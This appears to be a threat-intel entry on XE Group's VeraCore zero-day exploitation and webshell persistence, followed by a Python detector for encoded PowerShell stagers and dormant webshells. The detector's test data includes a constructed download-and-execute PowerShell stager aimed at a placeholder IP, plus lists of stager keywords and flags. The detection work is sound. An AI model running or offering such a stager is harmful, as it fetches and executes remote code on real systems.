From Credit Card Skimming to Exploiting Zero-Days
Essential information
- Published
- 03/02/2025 20:13
- Modified
- 04/02/2025 07:21
- Tags
- 2025-02-03, CVE-2024-57968, CVE-2025-25181, aspxspy, information theft, meterpreter, persistent access, powershell, remote access trojan, sql injection, supply chain attack, webshell, zero-day
- Related entities
- 4 vulnerabilities (cve), 17 observables, 1 intrusion set (apt), 17 techniques (mitre), 3 malware, 2 others
Description
XE Group, a cybercriminal organization active since 2013, has evolved from credit card skimming to exploiting zero-day vulnerabilities. The group initially focused on web application vulnerabilities and supply chain attacks, but has now shifted to targeted information theft in the manufacturing and distribution sectors. It has demonstrated increased sophistication by exploiting previously undocumented vulnerabilities in VeraCore software: an SQL injection flaw (CVE-2025-25181) and an upload validation vulnerability (CVE-2024-57968). XE Group maintains long-term access to compromised systems, as evidenced by its reactivation of an ASPXSpy webshell planted years earlier. Its recent activity includes exfiltrating configuration files, performing network reconnaissance, and deploying a remote access trojan via obfuscated PowerShell commands. This evolution highlights the group's adaptability and the growing threat it poses to supply chain security.
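Two of the behaviours summarised above, a dormant webshell being reactivated years after it was planted and a RAT stager launched through obfuscated (base64-encoded) PowerShell, are both visible in ordinary server telemetry. The following is an added example written for this page, not code from the report or from the actors it describes: it decodes `-EncodedCommand` payloads from process-creation events and flags `.aspx` paths that receive a request after a long silence in IIS access logs. The event format, hostnames, paths, IP addresses and the stager string are all constructed for the example and are not indicators from the report.

```python
"""Added example: two triage checks for the TTPs described in the summary.
Not from the report; hosts, paths, IPs and the stager text are constructed."""
import base64
import binascii
import re
from datetime import datetime

# Matches -e / -ec / -en / -enc / -encoded / -encodedcommand followed by base64.
ENC_RE = re.compile(r"(?<!\S)-e(?:c|nc?|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]+)",
                    re.IGNORECASE)
# Strings commonly seen in download-and-execute stagers (heuristic, not a full ruleset).
SCRIPT_INDICATORS = ("invoke-expression", "iex", "downloadstring", "downloadfile",
                     "net.webclient", "invoke-webrequest", "frombase64string")
# Launcher flags that hide the window or skip profile/policy checks.
FLAG_INDICATORS = ("-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                   "-noni", "-ep bypass")

# Constructed stager text (hypothetical URL on a documentation-range address).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')"
# Constructed process-creation events; the first mimics an encoded launcher.
PROCESS_EVENTS = [
    {"host": "app01", "cmdline": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode(STAGER.encode("utf-16-le")).decode("ascii")},
    {"host": "app02", "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]
# Constructed IIS-style lines: date time method uri status client-ip.
IIS_LOG = """\
2023-05-01 11:02:44 GET /Scripts/legacy_sync.aspx 200 203.0.113.5
2024-01-15 09:00:12 GET /Default.aspx 200 198.51.100.7
2024-01-28 14:22:03 GET /Default.aspx 200 198.51.100.7
2024-02-09 03:17:09 POST /Scripts/legacy_sync.aspx 200 203.0.113.5
2024-02-10 08:41:55 GET /Default.aspx 200 198.51.100.7
""".splitlines()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable.
    PowerShell encodes the script as UTF-16LE before base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def triage_powershell(events, min_score=2):
    """Score PowerShell launches by launcher flags plus indicators in the decoded body."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        if "powershell" not in cmd.lower():
            continue
        reasons = [f for f in FLAG_INDICATORS if f in cmd.lower()]
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encodedcommand")
            reasons += [s for s in SCRIPT_INDICATORS if s in decoded.lower()]
        if len(reasons) >= min_score:
            findings.append({"host": ev["host"], "score": len(reasons),
                             "reasons": reasons, "decoded": decoded})
    return findings


def find_dormant_reactivations(log_lines, dormant_days=180):
    """Flag .aspx paths hit again after at least dormant_days of silence.
    Requires log retention longer than the dormancy window to be meaningful."""
    hits = {}
    for line in log_lines:
        date, time, method, path, _status, ip = line.split()
        if not path.lower().endswith(".aspx"):
            continue
        hits.setdefault(path, []).append(
            (datetime.fromisoformat(f"{date}T{time}"), method, ip))
    findings = []
    for path, events in hits.items():
        events.sort()
        for (t0, _, _), (t1, method, ip) in zip(events, events[1:]):
            gap = (t1 - t0).days
            if gap >= dormant_days:
                findings.append({"path": path, "gap_days": gap, "method": method,
                                 "client": ip, "when": t1.isoformat()})
    return findings


if __name__ == "__main__":
    for f in triage_powershell(PROCESS_EVENTS):
        print(f"[ps] {f['host']} score={f['score']} {f['reasons']}\n     {f['decoded']}")
    for f in find_dormant_reactivations(IIS_LOG):
        print(f"[web] {f['path']} {f['method']} from {f['client']} after {f['gap_days']}d")
```

The dormancy check only works if access logs are retained for longer than the gap being hunted; a webshell planted years ago will look like a first-seen path in a 90-day log window, so pair it with an inventory of `.aspx` files whose creation time predates the retention window.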